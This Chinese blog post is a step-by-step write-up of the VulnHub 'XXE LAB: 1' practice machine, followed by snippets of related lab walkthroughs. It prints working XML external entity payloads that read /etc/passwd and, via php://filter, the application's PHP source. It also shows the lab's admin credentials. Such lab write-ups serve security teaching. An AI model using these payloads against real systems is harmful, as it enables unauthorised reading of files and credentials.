vulnhub靶场,XXE LAB: 1

最新推荐文章于 2024-07-30 21:39:07 发布
最新推荐文章于 2024-07-30 21:39:07 发布
阅读量2.4k 收藏 6
点赞数 1
分类专栏: 靶场实战 文章标签: xxe漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/122533611
版权

vulnhub靶场,XXE LAB: 1

环境准备

靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/
攻击机:kali(192.168.109.128)
靶机:XXE LAB: 1(192.168.109.195)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
目标:通过各种手段找到flag

信息收集

使用arp-scan-l确定目标靶机IP

确定目标靶机IP为192.168.109.195
使用nmap扫描查看目标靶机开放端口

开放端口:80、5355
浏览器访问目标靶机80端口

就是apache的默认页面,并没有什么
目录扫描

发现robots.txt页面,进行访问

发现一个xxe和一个admin.php页面,分别进行访问
xxe页面

admin.php页面

说找不到,可能admin.php页面并不在根目录下面
xxe页面的下一级目录进行扫描

可以看到admin.php页面其实是在xxe页面下的,那破局点应该就是xxe这个页面了

渗透过程

xxe这个登入界面暴力破解和SQL注入均无效,抓包看一下他的传输方式

可以看到账号密码是以xml的格式进行传输的,猜测这里可能存在xxe漏洞
使用burpsuite进行抓包,构造payload

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>


可以看到确实存在xxe漏洞,构造伪协议获取admin.php源代码,使用Base64编码防止php代码被执行

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>


将结果base64解码一下

可以看到账号密码直接显示在了源码中,并且下面还提示flag在flagmeout.php文件中
密码是加密的,先解密一波

使用administhebest:admin@123尝试进行登入

还是显示登入失败,那就先不管他了,使用xxe漏洞查看flagmeout.php文件的源码

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">
]>
<root><name>&sp;</name><password>hj</password></root>


将结果进行base64解码

这里面看着应该是base32的加密方式,使用base32进行解码

解码的结果又是base64加密,在进行一次base64解密

说明flag在/ect/.flag.php文件里面,继续使用xxe漏洞查看其源码

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>


结果使用base64进行解密

得到一串不知道是什么的加密密文
前面发现所有文件都是php类型的,这里直接将他保存为php类型的文件在自己的wamp环境运行一下看看

本地访问http://127.0.0.1/flag.php

可以看到flag就在里面,靶机XXE LAB: 1渗透结束

super 硕
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CTF之XXE Lab 1靶机渗透(base加密)
afei001
07-11 519
     练习环境      攻击机:kali      靶机:XXE Lab: 1      下载地址:https://download.vulnhub.com/xxe/XXE.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.3.0/16 IP At MAC Address Count Len MAC Vendor / Hostname ------------------------.
[红日安全]Web安全Day8 - XXE实战攻防
hongrisec的博客
03-03 986
本文由红日安全成员: ruanruan 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pyt...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub靶场可关注博主,然后私聊我哦】 同时内含vulnhubxxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
XXElab1
Greycheung的博客
12-31 250
在今天开打之前,我们先来了解一下什么是XXE攻击有关知识。 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 XML XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 DTD DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。 DT
XXE-lab-master靶场:PHP_xxe
最新发布
weixin_68416970的博客
07-30 777
XXE-lab-master:PHP_xxe的练习教程
VulnHub XXE Lab: 1 WP
小小的花园里面挖呀挖呀~
08-31 9151
XXE(XML External Entity Injection) XML外部实体注入,XML是一种类似于HTML(超文本标记语言)的可扩展标记语言,是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 XXE Lab: 1 下载地址:https://download.vulnhub.com/xxe/XXE.zip 扫描子网段发现靶机IP为:172.16.12.1.
vulnhub-XXE Lab: 1靶机实验
yiiiing的博客
08-25 515
vulnhub-XXE Lab: 1靶机实验 靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip 虚拟机设置为net模式 使用nmap探测下目标ip:192.168.124.136 网页是apache默认页面 使用kali枚举一下目录,扫出来一个robots.txt文件 访问http://192.168.124.136/robots.txt 有两个登陆界面 这里在post包中加入XML攻击代码,需要注意红框中的内容 <?xml versio
Vulnhub靶机】XXE Lab: 1
过期的秋刀鱼
09-18 328
解码地址:https://www.qqxiuzi.cn/bianma/base.php。运行需要php版本较低 ,高版本会报错,导致出不来结果。解码,得到一个路径,再次外部实体注入。随意输入账密,登陆抓包。解码发现了用户名和密码。先用得到的账密进行登陆。
XXE漏洞
qi_SJQ_的博客
01-21 565
概念 全称XML External Entity Injection, 即xml外部实体注入漏洞,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口 扫描、攻击内网网站等危害。 了解一些xml,我们知道xml是一种数据存储类型,用于传输,而html用于显示。 XML被设计为数据和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可 选)、文档元素,其焦点是数据传输工具。 自己当初的学习笔记 XML与HTML的主要差异: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设.
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1768
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
(vulhub靶机通关) XXE LAB: 1
yang1234567898的博客
01-16 2813
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
XXEinjector.zip
08-24
XXEinjector 一款XXE注入测试工具,可以通过命令行快速检测可能存在的XXE漏洞
XXE Lab:1题解
weixin_34314962的博客
11-07 783
思路 题目已经提示是XXE的专项练习,所以,直接找XXE问题. 难度 入门 端口扫描 nmap -sS -A 10.129.10.64 发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件 80端口检查 其中,/xxe/index.php页面通过xml格式提交用户名和密码,于是,此处即为XXE所在位置。构造如下payload,读取页面源码,获得一不知是flag还...
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 3136
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
vulnhubXXE靶机详解
天天学安全专属博客
03-20 870
vulnhubXXE靶机详解
XXE Lab渗透测试实战靶场
zhangpeng999123的博客
04-23 3136
任务描述:信息收集。 1. 首先查看kali机器IP地址: 10.1.1.91 2. 使用netdiscover扫描本地网络主机: # netdiscover -r 10.1.1.0/24 -r range:扫描给定范围而不是自动扫描。 3. 使用nmap扫描目标ip: # nmap -sV -p 1-65535 10.1.1.93 ...
vulnhub XXE靶场复现
weixin_44914783的博客
09-19 1477
信息收集 (1)如图,为环境搭建好之后的状态,暂时什么都未知 (2)使用nmap工具对网段进行扫描,获取到xxe平台的IP和端口开放情况,可以判断出该平台IP为192.168.159.223 (3)进行验证,成功 (4)使用kali工具dirsearch对网站进行目录扫描,发现敏感文件robots.txt (5)访问192.168.159.223/robots.txt,再次发现两个敏感文件,依次访问 ...
vulnhub靶机:xxe
weixin_68416970的博客
06-15 958
看不懂,应该是flag.php里的内容,猜测是php代码,于是放入在线的php环境或者自己的 网站查看。php解析器版本是php5才能正常解析出flag,版本过高都会显示不出flag。得到登录密码,因为是在admin.php的源码里于是访问admin.php网址。因为是xxe靶场,于是猜测登录是用xml数据传输,使用burp抓取登录包内容。访问本地xxe.php的源码,用base64格式输出,解码得。全是大写字母和数字,猜测是base32加密,再解密。并无发现,同样的方法查看admin.php。
pikachu靶场xxe漏洞
09-07
[1]这个靶场提供了一个接收XML数据的API,用于演示和学习xxe漏洞的原理、利用方法和思路。你可以在GitHub上找到该靶场的地址,并直接解压在www路径下进行使用。 在xxe漏洞的利用过程中,可以通过代码进行文件读取、...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值